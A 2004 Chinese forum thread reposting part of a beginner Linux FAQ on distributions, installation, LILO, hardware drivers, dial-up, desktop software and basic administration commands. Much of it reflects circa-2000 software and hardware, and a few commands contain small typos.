Xterm是由北京冲浪公司制作的Linux发行版，可以算得上中国最早的Linux发行版。它的最大特点是：用户界面好，进入门槛低，适合初学Linux人试用。
RedFlag是由中科院、北大方正、康柏公司联合开发，是基于RedHat Linux改进的中文版。它的特点是：开发力量强大，比较权威，可以一试。

18.哪种版本Linux适合我？
相对来说，SlackWare、RedHat、Debain这三种发行版比较适合一些有一定基础，或很强调性能、稳定性的人。笔者强烈推荐使用RedHat。
TurboLinux、BluePoint、RedFlag、Mandrake则在用户界面比前三种更友好，稳定性适中，其中Turbo、BulePoint、RedFlag还内置了中文支持，应该是刚从Windows转到Linux中的人的最好选择。
而象Xterm、联想Happy等这些的用户界面更加优秀，内置的中文支持，捆绑了更多游戏、办公软件，比较适合Linux的尝试者或初学者使用。
以上皆为本人观点，随着时间的变化，以上评价会有失偏颇，仅供参考。

19.如何得到Linux？
你可以通过以下方法获得Linux：
1） 从网站上下载，如www.redhat.com、freesoft.cei.gov.cn等；
2） 购买Linux发行版的光盘；
3） 复制Linux发行版的光盘，这种方法在GPL中是合法的！！


三、 走进Linux殿堂：35问

20.安装Linux，对硬件有什么要求？
Linux对硬件要求很低，可以运行在386以上CPU，8M以上内存的IBM PC机上。但由于设备厂商的支持力度不够，所以Linux倒是对很多新设备的支持不是很好，新设备的驱动程序总是慢一步。

21.安装Linux需要做哪些准备？
1） 收集系统资料：记录下内存大小，CDROM接口类型，SCSI卡型号，网卡型号，鼠标类型，显卡芯片组、时钟芯片、显存大小等相关信息；
2） 检查CMOS设置，关闭病毒开发，设置其从光驱启动；
3） 如果你的Linux安装盘无法自启动的话还需制作启动盘；
4） 为Linux的安装腾出硬盘空间，最好有1G左右。

22.安装Linux前要有哪些基础知识呢？
安装Linux时，至少需要两个分区：Linux native主分区、Linux Swap交换分区。主分区用来存放Linux的文件，交换分区为运行Linux提供虚拟内存。
交换区每个8-256M，最多可以有8个，一般建立一个与内存等大的就行了。
DOS中，不管物理上、逻辑上，每个分区就是一个独立的部分，比如：C盘、D盘、E盘，每个盘都有一个根目录。而在Linux中，物理上是一个个分区，而逻辑上所有的分区都是一个整体的，Linux中只有一个根目录。

23.Linux如何命名我的硬盘？
Linux对硬盘的处理，与DOS系统基本上是一样的，先做分区，然后再做格式化。分区的命令是不同的，DOS下，每一个分区是用一个英文字母来表示，而在Linux下则更加灵活，它通过字母和数字的组合来标识硬盘分区。
如"hda1"，hd是一个部分，代表IDE硬盘，如果是SCSI硬盘的话，为sa；a代表IDE1口的主硬盘（2代表IDE1口从硬盘、3代表IDE2口主硬盘、4代表IDE2口从硬盘）；最后的数字代表在该设备上的分区顺序，前四个分区（主分区和扩展分区）用1-4表示，软逻辑分区从5开始。

24.如何安装Linux？
每种Linux发行版所提供的安装方法都不大一样，但是一般来说都经历以下几个阶段：
1） 一些基本设置：如安装语言、键盘；
2） 进行硬盘分区、格式化：一般发行版都提供了图形界面，如果不熟悉硬盘分区的爱好者最好在行家指导下进行；
3） 选择要安装的软件包：建议初学者全部安装，待以后熟悉了后再重新定制，以免在学习过程中丢这落那的；
4） 设备配置：如打印机、网卡、显卡等，请根据实际情况选择；
5） 安装LILO：建议装在主引导扇，使用LILO来完成多系统引导；
6） 为Linux的超级用户root设置密码。
大家可以参考每种Linux的相关资料来尝试安装。

25.如何在一块硬盘上安装多个作系统？
许多Linux爱好者都希望能够在保留Windows9x作系统的同时，安装Linux。为了能够在多个作系统的自动选择，就需要一个启动管理器，Linux带了一个很好的启动管理器---lilo。
所以在安装多个作系统时，你只需先安装其它作系统，最后安装Linux，并将lilo安装在主引导扇上，这样重新启动系统时，将出现lilo：等待你选择你要启动的作系统。

26.如何配置linux启动管理器lilo？
根据需要修改/etc/lilo.conf文件，然后执行/sbin/lilo让设置生效。下面是一个lilo.conf文件的示例：
boot=/dev/hda
map=/boot/map
install=/boot/boot.b
prompt
timeout=50
default=linux
image=/boot/vmlinuz-2.2.5-15
label=linux
root=/dev/hda1
initrd=/boot/initrd-2.2.5-15.img
read-only
other=/dev/hda2
label=windows
其中，timeout是用来设置lilo等待输入的时间，在此表示如果5秒不选择的话就进入default；
default选项用来指定默认启动哪个系统；
image小节用来指定linux的启动信息，包括启动位置，名字--linux；
other小节用来指定其他作系统的启动信息，包括启动位置、名字。

27.如何启动、关闭系统？
启动Linux很简单，只要在lilo中选择linux（输入linux）就可以了，在启动过程中，将会向控制台写许多信息，直到出现用户登录提示login:，输入用户名和密码就可以登录系统，开始Linux世界的探索。
关机时一定要注意，不能直接关闭计算机电源，那样会破坏Linux的文件系统，你可以使用以下命令来实现：
1） 重启：执行reboot命令或同时按下Ctrl+Alt+Del键；
2） 关闭系统：执行shutdown -h now命令。

---

作者: 316846129    时间: 2004-6-11 23:09
接上
28.Linux下的目录作与DOS/Windows有什么不同？
Linux的文件系统与DOS类似，也是采用树形结构的。但目录的表示有一点是完全不同的，Linux用"/"表示根目录，而DOS用""表示根目录。以下是在Linux下常用的目录作命令：
1）"mkdir 目录名"：建立目录；
2）"rmdir 目录名"：删除空目录；
3）"cd 目录名"：改变目录；
注:cd与目录名之间一定要空格，比如到根目录，需用"cd /"，而非"cd/"
4）"pwd"：查看自己所在的目录；

29.在Linux如何对文件进行作？
你可以使用ls -l命令列出目录的详细信息，就相当于DOS的DIR命令。ls命令的输出如下所示：
total 2
drwxr-xr-x 2 xu user 1024 Mar 13 0:34 sub1
-rw-r----- l xu user 678 Jun 15 1:45 hodo.txt
最左边一列是文件/目录权限，第3列是的属主信息，第4列是属主所在用户组，第5列是所占空间大小，接下去是日期、时间，最后一列是文件/目录名。以下是一些 常用文件作命令：
rm：删除文件 more：浏览文件 cp：拷贝文件

30.如何编辑一个文本文件？
你可以使用vi来编辑一个文件文件，它是在 Unix 世界里最普及的文字处理工具，几乎所有的UNIX机器上都有这个编辑器。
1） 启动vi：执行"vi 文件名"，一启动vi在命令状态，可以输入各种vi的命令，不能编辑；
2） 存盘：w、存盘退出：wq、不存盘退出：q!；
3） 进入编辑状态：插入：i、新增：a；
4） 退出编辑状态：按ESC键；
5） 进入编辑状态后，编辑起来很像DOS下的edit；
6） 在命令状态下还有一些常用的命令：
x 删除游标所在字元；
　　 dd 删除游标所在的列。

31.安装完Linux后，根目录下一大堆，都是些什么？
/bin：存放最常用命令；
/boot：启动Linux的核心文件；
/dev：设备文件；
/etc：存放各种配置文件；
/home：用户主目录；
/lib：系统最基本的动态链接共享库；
/mnt：一般是空的，用来临时挂载别的文件系统；
/proc：虚拟目录，是内存的映射；
/sbin：系统管理员命令存放目录；
/usr：最大的目录，存许应用程序和文件；
/usr/X11R6：X-Window目录；
/usr/src：Linux源代码；
/usr/include：系统头文件；
/usr/lib：存放常用动态链接共享库、静态档案库；
/usr/bin、/usr/sbin：这是对/bin、/sbin的一个补充；

32.如何安装网卡？
你可以用root登录后运行netconf来安装网卡。输入网卡的设备名、选择网卡的模块号，IO地址、IRQ中断等信息，然后存盘退出，执行：/etc/rc.d/init.d/network restart；
如果你的网卡未能列在可选的网卡模块列表中的话，你就需要下载驱动程序，然后将其编译成模块。最后用"insmod 模块名"命令完成安装。

33.如何驱动D-Link DE220网卡？
D-Link的DE220是一款性价比较好的，支持即插即用的ISA网卡。但正是由于即插即用功能使得其在Linux下安装会遇到一些麻烦：
1） 在DOS环境下，用DE220网卡的驱动程序盘中的一个工具setup将其设置成非PNP的；
2） 到Windows的控制面板中获取其IO地址和中断号，一般情况下，IO地址是240，中断号是10；
3） 启动Linux，登录后执行"netconf"，将第一块网卡设为Enable，设备名为eth0，模块为ne，IO地址为0x240，IRQ为10；
4） 存盘退出后，运行/etc/rc.d/init.d/network restart即可。

34.如何驱动D-Link DFE530 TX网卡？
D-Link 530 TX网卡是一款性价比较好的10M/100M自适应的PCI网卡，拥有广大的用户群，然后Linux在安装向导中却没有列在列表中。
其实，一般Linux都已经包含了这款网卡的驱动模块：tulip.o，你可以直接执行"insmod tulip"来完成网卡的安装。

35.如何驱动D-Link DFE540 TX网卡？
如果你的网卡是D-Link DFE540 TX，那么在安装时不要选网卡，否则可能造成一些不必要的麻烦。
1） 从http://cesdis.gsfc.nasa.gov/linux/drivers/tulip.html下载最新的tulip.c文件，并复制到/usr/src/tulip下；
2）执行以下命令，编译生成tulip.o：
　　#cd /usr/src/tulip
　　 #gcc -DMODVERSIONS -DMODULE -D__KERNEL__ -Wall -Wstrict-prototypes -O6 -c tulip.c
3）执行insmod tulip.o；
4）执行/etc/rc.d/init.d/network restart，让网卡生效。

36.如何驱动Davicom 9201网卡？
Davicom 9201 PCI网卡在安装Linux时，不能直接完成。其实，大多数的Linux发行版都提供了这款网卡的驱动模块---dmfe.o，如果你的机器也是这种网卡的话，可以在安装Linux时略过网卡配置，安装完启动系统、登录后，执行："insmod dmfe"命令添加驱动模块，然后执行"/etc/rc.d/init.d/network restart"就可以了。

37.如何驱动第二块网卡？
在Linux系统中，你可以很容易地使用配置工具netconf安装第二块网卡，在netconf中选择第二块网卡，设备名：eth1、选择其驱动模块、输入IO地址和IRQ中断号，存盘退出后，执行：
/etc/rc.d/init.d/network restart

38.如何驱动普通声卡？
在Linux系统中提供了一个十分方便使用的声卡配置工具sndconfig，如果你的声卡比较大众化，就可以使用它来驱动你的声卡：
1） 用root登录系统，运行/usr/sbin/sndconfig；
2） 从声卡选择列表中选择适合你的声卡，一般的声卡都可以使用SoundBlaster；
3） 选完后，sndconfig需要你设置声卡的IO地址和IRQ中断号，根据你的实际情况选择；
4） 设置完成按OK按钮，如果听到Linus说话的声音就大功告成了。

39.如何驱动YAMAHA719声卡？
Yamaha719声卡在Linux下的驱动是十分麻烦的：
1） 重新编译核心，不选择SB或SB PRO之类的声卡，选中CRYSTAL SOFTWARE …的芯片；
2） 然后，重新配置声卡，选CS4xxx选项；
3） 再填写好相应的I/O地址、IRQ中断、DMA即可。
如果你的声卡是Yamaha 724的话，请使用OSS来解决。

40.通用声卡安装程序OSS如何使用？
OSS是一款解决Linux下声卡难以配置问题的商业软件，它支持绝大部分的Linux发行版，你可以到http://www.opensound.com/下载。
1） 将下载的OSS软件包osslinux392v-glibc-2212-UP.tar.gz解压：
tar zxvf osslinux392v-glibc-2212-UP.tar.gz
2） 在解开的目录下执行./oss-install，程序一般会提示你已经安装了其它声卡模块，选择去掉；
3） 接下来就是处理过程、协议及一大堆东西，接受协议安装，使用默认安装路径即可(/usr/lib/oss)；
4） oss一般可以自动检测出大部分声卡，如果与你的实际情况相符，就直接在菜单中选择"Save changes and Exit.."就完成了设置；
5） 你可以使用/usr/lib/oss/soundon命令用来打开oss驱动，用/usr/lib/osssoundoff关闭oss驱动。 　 　

41.通用声卡安装程序ALSA如何使用？
ALSA，Advanced Linux Sound Architecture，是一个遵从GPL版权的通用PCI声卡解决软件。这个软件包括rpm和tar两种格式，其中rpm格式比较容易安装，这里就以rpm包为例介绍。
1）到http://www.alsa-project.org下载以下四个文件：
alsa-driver-0.4.1d-1.i386.rpm
alsa-lib-0.4.1d-1.i386.rpm
alsa-utils-0.4.1-1.i386.rpm
alsaconf-0.4.1-1.386.rpm
2）执行以下命令完成安装：
rpm -ivh alsa-driver-0.4.1d-1.i386.rpm
rpm -ivh alsa-lib-0.4.1d-1.i386.rpm
rpm -ivh alsa-utils-0.4.1-1.i386.rpm
rpm -ivh alsaconf-0.4.1-1.386.rpm
3） 然后执行alsaconf命令，选择合适的声卡类型；
4） 重新启动系统，然后执行命令：/usr/doc/alsa-driver/snddvices

42.Linux下如何安装Modem？
1） 在Windows中查看你的Modem位于什么端口上；
2） 在Linux中通过直接与端口交互来使用Modem，其对应关系如下：
COM1：/dev/cau0 COM2：/dev/cau1
COM3：/dev/cau2 COM4：/dev/cau3
3） 设置Modem的最高速率：
＃setserial /dev/cau1 spd.hi （最高速率设为57600bps）
＃setserial /dev/cau1 spd.vhi （最高速率设为115200bps）

43.如果通过Modem拔号上网？
1） 执行命令ln /dev/modem /dev/cau1（根据实际情况）
2） 创建一个脚本：touch sw，加入：
/usr/sbin/pppd connect ′/usr/sbin/chat ″ ″ ATDT163 CONNECT ″ ″ ogin:username word:password ′ /dev/modem 38400 modem defaultrout
将username与password用你的上网帐号和密码代入。
3） 你还可以使用KDE中的kppp工具方便地实现。

44.Linux下有图形界面吗？
为了完善Unix系统的图形界面，麻省理工学院在1984开始了一个X-window开发计划，通过十余年的发展，X-window这一自由软件已经成为了Unix/Linux世界图形界面的事实标准。
X-window分为三个层次：
1）X-Window底层库，是最低实现层；
2）X-SERVER，与显卡相关的中间层；
3）窗口管理器，实现最终用户界面，如KDE、GNOME等。

45.如何配置X-Window？
所谓配置X-Window就是根据机器的实际设备选择X-SERVER。可以通过xf86config或图形化界面的Xconfigure等程序来配置。
1） 运行Xconfigure程序，然后选择合适的显卡类型，如果没有，则需要下载显卡的驱动；
2） 选择显存大小，和X-SERVER；
3） 选择合适的分辨率、色深组合
4） 存盘退出后，运行startx启动X-Window。

46.如何驱动intel i740显卡？
如果你的Linux无法识别i740的话，你可以这么做：
1）下载新的 显卡数据库 和 i740 XBF驱动程序：
xf86config-glibc-1.0.0.i386.tgz 和 xfcomi740.tgz
2）解压这两个包，覆盖原来目录：
tar xvfz /tmp/xf86config*.tgz
tar xvfz /tmp/xfcomi740.tgz
3）执行cp /usr/X11R6/bin/XFCom_i740 /usr/X11R6/bin/XF86_XBF_i740；
4）用xf86config进行配置：显示器水平扫描频率选6；垂直刷新频率选2；在显卡库选择时，选311（即i740）；显卡服务器类型选5；
5）配置完成后运行startx就行了。

47.如何驱动intel i810显卡？
Intel公司的两大显卡i740、i810都为Linux爱好者驱动带来不小麻烦，Intel公司为了以实际行动支持Linux，特意在网站上详细介绍了如何在Linux下配置i810显卡，你可以到下面的网址下载安装说明和软件：
http://support.intel.com/support ... 810/linuxinstal.htm

48.如何驱动Savage4显卡？
1） 到www.linhardware.com下载savage2000的驱动程序；
2） 使用tar -xvfz 文件名解开驱动程序；
3） 解压后，你能看到五个文件，其中有一个是XF86_SVGA；
4） 备份/usr/X11R6/bin/XF86_SVGA，然后将新的XF86_SVGA复制到这个目录下，替换掉这个文件；
5） 重新运行xf86config配置，不选显卡，在选X-server时，选3（也就是SVGA），并且不检测；
6） 完成后，运行startx -bpp32，就可以了。

49.如何驱动SAVAGE3D显卡？
1） 到ftp.lib.pku.edu.cn/incoming/savageX下载Savage3D显卡的驱动程序：SavageX_0_1_4.tar.gz；
2） 解压这个程序，用新的XF86_SVGA替换/usr/X11R6/bin的原文件；
3） 运行Xconfigurator,配置显卡时选择Unlisted Card, 然后选择Xserver为SVGA；
4） 完成后，运行startx运行x-win。

50.有没有通用的显卡驱动方法？
由于显卡产商支持有限，使得在Linux下驱动显卡一直都是难题。为了解决这个问题，Linux 2.2.x以上版本提供了一种新的解决方案---使用frame buffer设备，通过VESA VBE 2.0标准，利用显卡SVGA特性，配合XFree86的XF86_FBDev，驱动你的显卡。这的确可以帮你个忙。
1）确认你有XF86_FBDev文件，如果没有就从ftp.xfree86.org下载；
2）执行"mknod /dev/fb0 c 29 0"建立frame buffer设备；
3）修改/etc/lilo.conf文件，加入：
image = /boot/vmlinuz-2.2.5-fb （新编译的内核）
label = linuxfb （启动标号，可自定）
root = /dev/hda2 （参照lilo.conf其他部分）
vga = 0x314 （显示模式，参照下表）
附：显示模式表
640x480 800x600 1024x768 1280x1024
256色 0x301 0x303 0x305 0x307
32k色 0x310 0x313 0x316 0x319
64k色 0x311 0x314 0x317 0x31A
16M色 0x312 0x315 0x318 0x31B
4） 执行/sbin/lilo，使配置生效，然后重启系统，以新的内核启动系统。当然，如果你的内核已经支持了，就无需做这个修改，直接加上vga=那一行就行了。
5） 接着进行frame buffer Server的配置：参照/etc/X11/XF86Config中vga的配置，加入一个screen小节，如下所示：
Section "Screen"
Driver "fbdev"
Device "My Video Card"
Monitor "MAG XJ500T"
Subsection "Display"
Depth 16 (色深，须与前面所选显示模式的色深一致)
Modes "default"
ViewPort 0 0
EndSubsection
EndSection
6） 将X指向XF6_FBDev：
cd /etc/X11
mv X X.bat
ln -snf /usr/X11R6/bin/XF86_FBDev X

51.如何通过ISDN上网？
ISDN的应用越来越普及，它速度快、价格便宜，深受网民的喜欢，那么在Linux下如何通过ISDN上网呢？
1） 确认你的Linux内核已经包含了对ISDN的支持模块；
2） 驱动ISDN卡：
对于非即插即用的Teles 16.3 ISDN卡可以使用命令：
＃modeprobe hisax io=0x180 irq=10 type=3 protocol=2 id=isdn0
对于即插即用型，则使用：
＃pnpdump〉/etc/isdn.conf
＃isapnp/etc/isdn.conf
＃modprobe hisax irq=10 io=0x680 type=14 protocol=2 id=isdn0
3） 安装Isdn4Linux，再执行scripts目录下的"makedev.sh"脚本程序，加入ISDN设备；
4） 执行echo 1〉/proc/sys/net/ipv4/ip_dynaddr命令让其支持动态IP；
5） 然后根据ppp的脚本再写一个用ISDN的脚本就行了。

52.如何在Linux下使用光驱？
1）创建一个目录，用来挂上光盘目录树：
mkdir /mnt/cdrom
当然目录名可以根据你自己的习惯命名；
2）插入光盘，执行"mount -t iso9660 /dev/hdc /mnt/floppy"命令；注意，如果你的光驱接在第一硬盘线的从盘上，需将/dev/hdc改为/dev/hdb；
3）然后你就可以通过访问/mnt/cdrom来实现对光盘访问；
4）当你不使用时，执行"umount /mnt/cdrom"，再取出光盘。

53.如何在Linux下使用软驱？
1） 与光盘类似，创建floppy目录；
2） 软盘插入后，执行"mount -t msdos /dev/fd0 /mnt/floppy"命令， 注：若是软盘中是长文件名格式的，将上条命令中的"msdos"改为"vfat"，若是 Linux文件格式，则去掉"-t msdos"；
3） 当你不使用时，执行"umount /mnt/floppy"，再取出软盘。

54.如何在Linux下读取非Linux分区的内容？
1） 创建一个目录：mkdir /mnt/other
2） 执行"mount -t 文件系统类型 分区 /mnt/other"命令；
注：文件系统类型包括：modos-FAT16、vfat-FAT32、ntfs-NTFS；
分区指该分区的设备名。
3） 当你不需要使用时，执行"umount /mnt/other"。
四、 Linux下的"神兵利器"：15问

55.KDE是什么，有什么特点？
KDE项目在1996年10月发起的，其目的是在X-Window上建立一个完整易用的桌面环境。KDE现在除了拥有KFM(类似于IE4.0)、KPresenter(类似PowerPoint)、KIllustrator(类似CorelDraw或 Illustrator)等重量级软件，还有体贴用户的GUI配置软件可以帮助用户配置Unix/Linux，使其深受使用者欢迎。
但由于KDE是基于由TrollTech公司开发的Qt程序库的，所以也受到了许多批评。虽然Qt本身作为一基于C++的跨平台开发工具是非常优秀，但可惜的是它不是自由软件。Qt的License允许任何人使用Qt编写免费软件及免费拷贝给其他用户使用，但如果利用Qt编写非免费软件则需要购买他们的License。更重要的是任何人都不可以随意修改Qt源代码。如果TrollTech公司更改Qt License、公司倒闭或给人收购等都会令KDE前功尽弃。

56.GNOME是什么，有什么特点？
1997年8 月，为了克服KDE所遇到的QT许可协议和单一C++依赖的困难，以墨西哥的Miguel de Icaza为首的250程序员就开始了一个新项目，完全从头开始，这就是GNOME。
经过14个月的共同努力，终于完成了这个工程。现在GNOME已得到了占Linux 市场份额最大发行商Red Hat 的支持，拥有了大量应用软件，包括文字处理软件Go，电子表格软件Gnumeric，日历程序GNOMEcal，堪与PhotoShop 媲美的图形图像处理软件Gimp 等。
现在GNOME与KDE成为了两大竞争阵营，必将使得Linux更加易于使用。

57.在Linux下如何播放CD？
当你成功地在Linux环境下驱动了你的声卡之后，你就可以通过使用X-window中的一个CD播放器来播放CD了，它在多媒体工具中。界面如下图所示：

58.能不能在Linux下播放VCD？
你可以使用MpegTV Player 1.0这个Linux下的VCD播放器实现你的愿望。　　安装MpegTVPlayer不需要特殊的硬件设备，只需运行X Window即可使用。
它模仿了录像机的播放控制键，如 : 播放、快进、快退、停止、定格、搜索、音量调节、静声、音量平衡、循环播放、画面放大缩小、自动播放等。播放过程会显示整个节目要用时间、已用时间。
你可以到下面站点下载MpegTV Play：http://www.mpegtv.com。

---

作者: druid1111    时间: 2004-6-11 23:10
接上
59.有没有Linux下MP3播放工具？
Linux下有很多MP3的播放工具，其中mpg123 应该是最经典的一种，它可以在控制台使用。许多图形界面的mp3播放软体都是利用这个程式来 播放mp3的。下面是它的一些基本的参数介绍：
-a device 设定所使用的音效装置,预设为/dev/audio或/dev/dsp
-@ file 从档案file中读取要播放的mp3档案名称列表
-z 随机播放
如果只是要单纯地播放一两首歌，或是要播放一整个目录下的歌，利用mpg123倒是个不错的选择，若是要复杂一点的功能如选择多目录内的特定mp3档案，那可能需要写个script来执行。

60.如何在Linux下浏览网页？
想要浏览网页，需要满足两个条件：
1） 你的电脑已经连上了Internet；
2） 使用浏览器软件来实现浏览；在Linux下有两种常用的浏览器：
控制台下可以使用lynx；
X-window中可以使用netscape的Linux版本；
它们的使用方法与在Windows中的浏览器基本类似。

61.如何在Linux下收发E-Mail
在Linux下你可以使用mail、pine在控制台命令行下收发E-Mail，在X-window中可以使用Kmail来收来E-Mail。

62.能不能让Linux显示中文呢？
用的英文版的Linux，你可以安装中文模拟终端chdrv使Linux能在命令行状态下显示和汉字。chdrv启动后在tty7（用Ctrl+Alt+F7）建立一个虚拟终端，用户在tty7上登录后就可以使用它提供的中文支持。
到ftp://ftp.ihep.ac.cn/pub/chinese/system获取已编译的chdrvbin-0.23.gb.tar.gz文件和字体文件chdrvfont.tar.gz，然后执行：
tar xvzf chdrvbin-0.23.gb.tar.gz
mv chdrvfont.tar.gz chdrv-0.23.gb/
cd chdrv-0.23.gb 进入此目录
./installbin 运行安装文件

63.有没有Linux下的中文输入法？
如果你使用的Linux是中文版，就无需另外安装了。如果你使用英文版的Linux的话，你可以安装chinput来实现中文输入。你可以到下面网址下载：
http://www.turbolinux.com.cn/~justiny/download/chinput-2.1.tar.gz
1） 下载后，解开该文件：tar -xvzf chinput-2.1.tar.gz
2） 解开后，进入 Chinput-2.1/src 里，修改 chinput.c文件，查找 GBK字样，将其改为 GB2312。再查找system("/usr/bin/zwincontrol &")；语句，将其取消（在前面加上 // ）；
3） 修改完后，执行make命令编译；
4）编译完成后，就可以在X-Window环境下使用了。

64.除了VI，还有其他文字编辑软件吗？
Vi是UNIX/Linux环境下最通用的一种编辑软件，但是它不是很友好。如果你对它不满意的话还可以尝试其它一些如emacs、joe等编辑工具。
笔者极力推荐emacs，这是自由软件基金FSF之父stallman的杰作，也是GNU项目第一个重磅炸弹，的确十分优秀，值得一试。不过最大缺点就是太复杂。

65.Linux下有没有像office一样的软件？
有，StarOffice就是基于Linux的一个办公软件的套件，它是一个商业软件包，其中包括字处理、电子表格、幻灯片制作等MS Office软件包含有的软件。对于个人用户还提供一个免费的版本。用户可以到以下站点下载：
http://studio.linux.org.cn。
StarOffice Office Suite for Linux是为非商业用户准备的，商业用户要使用StarOffice Office 则需要许可证。
ftp://ftp.gwdg.de/pub/linux/staroffice

66.Linux下有没有像photoshop一样的软件？
有，Linux下有一款十分著名的平面图形处理软件-GIMP。它的界面比Photoshop更简洁,启动时只有一个工具栏,看起来和Photoshop差不多.主菜单在用鼠标右键单击打开的图象时才弹出,像Channels,layers,brushes......一应俱全,外观也和Photoshop极为相似,用不着花时间去适应了. ....
这还不算特点.比Photoshop优越的地方也不少:如支持的图象格式极多,支持Texture Brush,像Painter那样刷出底纹图案来. Filter也更多了,比如有一种叫Alien Map的,把RGB三色进行sin,cos运算,达到特殊效果,真是奇思妙想.Undo功能也不错,我试了一下,至少支持5次undo.还有更令人欣喜的,就是对Web的支持,可以很轻松的做出定制的箭头,按钮,背景图案等,比Photoimpact更强大。
如果你离不开PHOTOSHOP,又付不起ADOBE掌柜的帐，又自认为玩艺术的人不用D版，试试GIMP吧！

67.能在Linux下玩游戏吗？
现在已经有For Linux的游戏了，除了大名鼎鼎的Doom之外，还用一些像acm-空战模拟游戏、xdemineur-挖地雷、xjewel-俄罗斯方块、xboard-国际象棋、xboing-弹珠台游戏。而且现在越来越多，为你在枯燥的学习中添上一丝乐趣。

68.在Linux下有C语言吗？其它语言呢？
在Linux下有自由软件基金FSF创建的重磅炸弹---GCC，它是一个强大的编译器，目前堪称是全世界效率最高的C/C++编译器，现在已经广泛应用在各种UNIX环境下。虽然，现在还没有C语言的集成开发环境，但这丝毫不影响GCC的流行，这也许就是自由的力量吧！
同时，Linux下也提供Fortran、Pascal、Perl、Cobol等多种语言的支持。

69.Linux下有哪些数据库软件？
Linux下有许多种数据库软件可供使用，其中有Oracle for Linux、IBM DB2 for Linux、Mysql、mSql、Post等。


五、 做好Linux的管理员：21问

70.如何检查Linux硬盘使用情况？
在Linux环境下，你可以使用df命令来查看硬盘的使用情况。下面就是一个df -T -h(-T参数：显示文件系统类型，-h参数用可读性较高的方式来显示信息)命令的输入实例：
Filesystem Type Size Used Avail Use% Mountedon
/dev/hda1 ext2 7.5G 4.7G 2.5G 65% /
/dev/hda2 ext2 653M 6.6M 613M 1% /root
/dev/hdb1 ext2 7.5G 3.5G 3.7G 49% /usr

71.Linux下有哪些压缩工具？
在Linux下有很多种压缩工具，常用的有：
1） gzip/gunzip：这是GNU开发的自由软件，使用相当广泛。压缩文件扩展名为".gz"。使用方法很简单，例如：
gunzip eos.gz gzip /home/test/*.txt；
2） compress/uncompress：这是一对历史悠久的压缩程序，文件经过它压缩后，压缩文件扩展名为 ".Z"。
3）除此之外还有：zip/unzip、bzip2/bunzip2等。

72.如何管理进程？
进程是程序的一次执行。可以使用"ps -auxw"列出在当前正在执行的进程的详细信息，包括每个进程都有的进程ID号。你可以通过"kill 进程ID号"来终止这个进程。

73.文件或目录的权限是什么意思？
文件或目录的权限位由10位构成，如-rwxr-xr-x。
1） 第一位代表文件/目录类型：d代表目录、-代表文件、l代表链接；
2） 剩下的9位分成3组，每组3位；2-4位描述文件主人的权限，5-7位描述与文件主人同一用户组的权限，8-10位则是其它用户的权限。
3） rwx：每组的3位分别是：读权限、写权限、执行权限；如果是-就代表没有这个权限。
也就是说-rwxr-xr-x表示，这是个普通文件，文件主人可以读、写、执行这个文件，与文件主人同组的用户以及其它用户都可以读、执行这个文件。

74.什么是用户帐号？
在Linux系统中，是通过用户帐号来标识每一个用户的，通过登录时输入不同的用户帐号和密码确定你的身份。也就是说，Linux系统通过用户帐号和管理系统的所有用户。
然后你可以创建一些用户组，将用户加入到组中去，让其获得用户组的权限。

75. 在Linux下，如何管理用户？
如果你想要新增一个用户：
1） 以root登录，然后执行"adduser 用户帐号名"
2） 执行"passwd 用户帐号名"来为这个用户帐号设置密码。
执行"userdel 用户帐号"删除一个用户；
执行"groupadd 用户组名"新增一个用户组；
执行"groupdel 用户组名"删除一个用户组；

76. 如何为用户作磁盘限额？
1）将要设置磁盘限额的分区，按以下格式修改/etc/fstab 文件：
/dev/hda2 /home ext2 defaults,usrquota 1 2
2）在要设置磁盘限额的分区目录下创建空文件 quota.user
#touch /home/quota.user
#chmod 600 /home/quota.user
3）重启系统后，就可以使用edquota -u 用户名来设置。

77.如何备份系统？
在Linux中，你可以使用dump/restore命令组来实现系统的备份与恢复。假设你需要将/usr目录下的所有文件完整地备份到磁带机上（假定设备是rmt8，不同的磁带机不相同），你可以使用命令：
dump -O -f /dev/rmt8 /usr
其中-O参数代表备份全部文件，"-f 设备文件名"参数指定备份到什么地方，最后的目录名指定要备份的内容。
然后，你可以使用以下命令恢复：
restore -r -f /dev/rmt8

78.如何安装.tar的软件包？
Linux软件有两种发布方式：一种是源代码方式，另一种是可执行文件包。而发布包大多是先用tar归档，再用gzip压缩，生成是以.tar.gz结束的文件。
你可以直接使用"tar xvfz 文件名"完成解压缩，解tar包工作。
如果你取得是可执行文件包，安装工作结束。
如果你取得是源代码包，则还需编译一下：
1） 在解压目录下运行"./configure"进行配置；
2） 在解压目录下运行"make"进行编译；
3） 运行"make install"安装。

79.如何使用RPM安装Linux软件？
RedHat公司提供的RPM工具，使得Linux软件安装更为方便。
1） 安装：rpm -ivh somesoft.rpm
2） 反安装：rpm -e somesoft.rpm
3） 查询：rpm -q somesoft

80.如果忘了root的密码，怎么办？
如果你忘了root的密码，可以通过以下方法恢复：
1） 重新启动Linux，出现lilo:时，输入linuxsingle进入单用户模式；
2） 这时无需密码就取得了root权限；
3） 再运行passwd重新设置root的密码。

81.重装Windows而破坏了Lilo时，怎么办？
这种情况可以使用两种方法恢复：
1）用Linux启动软盘启动，然后执行/sbin/lilo，重新在引导区建立lilo；
2）使用Linux安装光盘启动，选择升级系统，将会重建lilo。

82.如何制作Linux启动盘？
在Linux下，有一个工具mkbootdisk能很方便地制作系统启动盘：
1） 查看系统的版本，可以通过ls /usr/src来看；
2） 插入一张空软盘；
3） 执行"mkbootdisk --verbose 2.2.5"。

83.如何远程使用Linux？
我们可以使用telnet、rlogin、rsh、rcp等命令来实现远程使用Linux，但这这些方法在传输过程中是明文传输的，所以有可能带来许多不安全因素。因此，应尽量避免远程使用root帐户登录系统。


如何构建安全的远程登录？
使用SSH来实现安全的远程登录，因为SSH实现了数据传输的加密。
1） 从ftp.cs.htu.fi/pub/ssh获取ssh-1.26.tar.gz文件；
2） 用tar xvpf ssh-1.26.tar.gz解开这个包；
3） 到解开的目录/usr/local/src/ssh-1.26目录下执行./configure；
4） 执行make和make install来完成编译和安装。
5） 你就可以使用ssh来与安装了SSH的服务器建立安全的远程连接。

85.如何运行计划任务？
大大可能对Windows中的计划任务都比较熟悉了，它可以通过一些简单的设置，定时完成一些任务。在Linux系统的维护中，我们可以也会需要定期执行一些任务，这种情况可以使用：
1） at命令：它可以键盘或文件中读取指令，然后在指定时间完执行；
2） crontab守候进程：通过设置它的配置文件来定时执行某些任务。

86.Linux的开机过程都做了什么？
1） 一开机，CPU将控制权交给BIOS，BIOS完成开机自检；
2） 然后BIOS读取磁盘上的第一个扇区，并装入主引导扇区的lilo；
